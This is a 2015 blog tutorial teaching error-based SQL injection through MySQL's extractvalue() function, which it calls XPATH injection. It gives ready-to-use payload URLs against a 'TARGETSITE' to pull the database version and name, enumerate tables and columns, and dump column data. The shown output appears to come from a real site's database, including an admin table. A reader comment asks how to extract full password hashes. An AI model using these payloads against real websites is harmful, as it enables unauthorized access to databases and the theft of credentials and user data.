Social Icons

Tuesday, 14 July 2015

XPATH Injection Using Extractvalue

XPATH Injection Using Extractvalue

In This Tutorial we will Discuss about XPATH Injection Using Extractvalue
While We are injecting a Site and Then Come to the UNION BASED part .When we Execute Union Based Query meanwhile we Got There a ERROR Message
"The used SELECT statements have a different number of columns"
so we Used There XPATH injection.

let's Start Our XPATH Injection.
Here is a Target Let's Find The Version with XPATH
So here is our Query for Finding The Version in XPATH

XPATH QUERY: and extractvalue(0x3a,concat(0x3a,version()))

let's execute this Query in our Target Site.
http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,version()))-- -
XPATH Injection Using Extractvalue
So this is The Version:XPATH syntax error: ':5.5.42-37.1-log'
now Let's check The Current Database name There.

Here is the Query for finding the current Database name


XPATH QUERY: and extractvalue(0x3a,concat(0x3a,database()))

Execute this Query in our Target Site.

http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,database()))-- -
XPATH Injection Using Extractvalue
This is The Current Database name: XPATH syntax error: ':dealitea_dealiteasy'
Now Let's move on to our Further injecting .
Next is to finding The table names from the database.
Here is  The Query for Finding the Table Name.

XPATH QUERY: and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database())))
as we are injecting in XPATH so there we cant get all the tables .so we need to add LIMIT in our query to get The Tables One by One.
So let's Add LIMIT in our Query.
XPATH QUERY: and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)))

Now Execute this Query in Target Site For Finding The tables


http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)))-- -
Increase the limit to get other tables in the current Database.
Here we got the Table of Admin
XPATH Injection Using Extractvalue
Let's get the Columns from This Table: XPATH syntax error: ':deal_admin'
Here is our query for Getting Columns from the table.
XPATH QUERY:
and extractvalue(0x3a,concat(0x3a,(select concat(column_name) from information_schema.columns where table_name=OUR_TABLE_NAME_HERE limit 0,1)))--

We Execute this query for Getting The Columns.

http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,(select concat(column_name) from information_schema.columns where table_name=OUR_TABLE_NAME_HERE limit 0,1)))-- -

Increase the limit for other Columns in the Table.

And The Final Part is to Extracting Data from The Columns.
So Here is our Final Query.
XPATH QUERY: and extractvalue(0x3a,concat(0x3a,(select concat(COLUMN_NAME_HERE) from TABLE_NAME_HERE)))-- -
Execute this Query in the Target Site for Extracting data of Columns From the Target Table.
AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee

1 comments:

  1. any method to get the full password hash from XPATH or SQL injection. I tried this method but not getting the full hash. :(

    ReplyDelete